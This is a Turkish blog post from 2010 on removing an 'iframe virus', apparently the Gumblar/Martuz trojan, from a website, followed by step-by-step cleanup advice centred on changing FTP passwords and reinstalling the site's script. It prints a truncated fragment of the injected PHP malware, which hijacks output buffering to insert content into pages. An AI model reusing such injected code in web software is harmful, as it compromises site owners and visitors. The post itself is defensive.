17 Ocak 2010 Pazar

İframe Virüsü Temizleme iframe Nedir Nasıl Temizlenir Virüs İframe

iframe virüs ,iframe virisünü temizleme, iframe virüsü nasıl temizlenir, iframe virüsü nedir nasıl temizlenir iframe virüsü, iframe virüsünü temizleme yolları yöntemi iframe temizleme, sitedeki virüsü temizleme, siteme virüs bulaştı nasıl silerim virüsü, siteme virüs bulaştı silemiyorum, siteye bulaşan virüsü temizleme

"iframe virüsü" terimini google'da arattıgınızda yüzlerce sayfa karşınıza çıkacaktır ve bir süre önce benimde başıma gelmişti bu sorun iframe virüsü bulaştımı gitmeyen bir virüstür kodları temizlersiniz ama tekrar geri yazılır sebebi bilgisayarınıza bulaşan bir virüsün tüm sayfalara kod eklenmesi ile sizde bu zincire giriyorsunuz. 
yapılması gereken 2 önemli adım ftp şifrenizi kesinlikle değiştirin ve bilgisayarınızda  virüs temizliği web sitenizde ise virüslü kodların temizliğinin yapılması şart.
Benim Başıma bu sorunu yaratan virüsün adı Gumblar/Martuz virüsüdür daha doğrusu bir trojandır kendileri.
bir süre önce konu hakkında bir yazı yazmıştım yazıyı aynen yayınlıyoruz ve daha sonra detaylı bir şekilde nasıl iframe virüsünün temizleneceğini açıklayacağız.

1 değil 2 değil oyunu-oyna.info isimli siteyi burasi vasıtasıyla satın aldım iyi güzel pazarlık yapıldı her anlaşmasağlandı o güne kadar tıkır tıkır çalışan site adamın vasfındsan bizim adımıza geçince bir haller oldu ilk olarak host sapıtmaya VEYA SİTEDE ABUK SABUK REKLAMLAR AÇILIR PENCERELER ÇIKMAYA BAŞLADI daha sonra isimtescilden bir host aldık ama yine beladan kurtulamadık sürekli kod gömüyor şz. ler onarcade sistem ve gömülen kodlarda phpr.org ile şifrelenmiş ve hersafaya yerleştirilmiş 1 günüm temizlemek işle geçti ki yine temizlenmedi googleda site size zarar verebilişr uyarısı veriyor. yani bu siteden aldıgımdan beri hayır görmedim kısacası.

kendimin yönetiminde açtıgım 2 yıl süreyle faliyette olan 1download-tr.info sitede hiç bir sorun yaşamadım son zamanlarda pluginler kaynaklı hacklemeler olmuştu

kısacası kodlar ise şöyle:


her sayfdabu kod eklenmiş

ve fonksiyon sayfasına eklenilen kod :

#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('##','',$s);if(stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i

görüldüğü üzere bu ..liği yapan phpr.org sayesinde kodları şifrelemiş ama decoder'i olmadıgından ne oldugu gözükmüyor. 

 Yukarıda bir sinir harbi ile yazıdımdan dolayı gerekli küfür ve hakaretleri affetmenizi umuyorum :)

Eğer sizinde başınız bu sorundan beladaysa şimdi çözüme gelelim

iframe virüsü nasıl temizlenir.

Nedir bu iframe virüsleri İframe virüsü genellikle FTP programlarınızdaki kayıtlı oturumlar aracılığıyla altyapınıza girer ve genelde index.php – index.html gibi dosyalara etki eder… Girdiğinde sitenizi rahat bırakmaz arkadaşlar. Önce ftp programınızla virüs giren sayfalarınızı teker teker virüs kodlarını silmeyi denersiniz. Bu sistemde herzaman işe yaramıyor maalesef. Peki işe yaramadığında ne mi yapıyoruz ? Hemen açıklayalım.
1) Veritabanı yedeğinizi alın
2) Kullandığınız scriptteki temaları,.htacses kağıtlarınızı, eklentileri ve hosttaki uploadları indirin. (Ardından taratın ancak genelde iframe bu dosyalara girmez)
3) Geri kalan tüm dosyaları silin
4) Önceden kullanmış olduğunuz scripti (wordpress, drupal, vB, myBB artık ne karınağrısıysa) sıfırdan indirip ftp ye atın.
5) Veritabanı yedeğinizi tekrar yükleyin.
6) .htacses dosyanızı, temalarınızı, eklentilerinizi ve uploadlarınızı yeniden yükleyin.
7) FTP login bilgilerinizi değiştirin.*Önemli
İşte bu kadarArkadaşlar aslında bunu başka sitelerde değişik yöntemlerlede halledebilirsiniz ancak bu kesin çözümdür.

Pratik çözüm ise (Problemimi bu şekilde çözdüm) 3 Adımda iframe virüs temizleme

  1. Öncelikle en önemlisi ftp şifrenizi değiştirin
  2. Bilgisayarınızda virüs taraması yapın.İlgili konumuza buradan ulaşabilirsiniz.(Adım 2'de mevcut aşama aşama tara ve temizle)
  3. Daha Sonra ftpdeki tüm içeriğinizi indirin httaccess php dosyaları js ler vs tüm içeriği indirdikten sonra Ultra edit isimli programı yükleyin ve program içerisinden tüm kodları değiştirme özelliği ile silin ve dosyalarınızı kaydetip tekrar ftp'ye yükleyin.
Ben problemimi bu şekilde çözmüştüm yukarıdaki kesin çözüm ile uğraşmak istemeyenler yapabilir pratik çözümümü faydalı olması dileğiyle

Hiç yorum yok: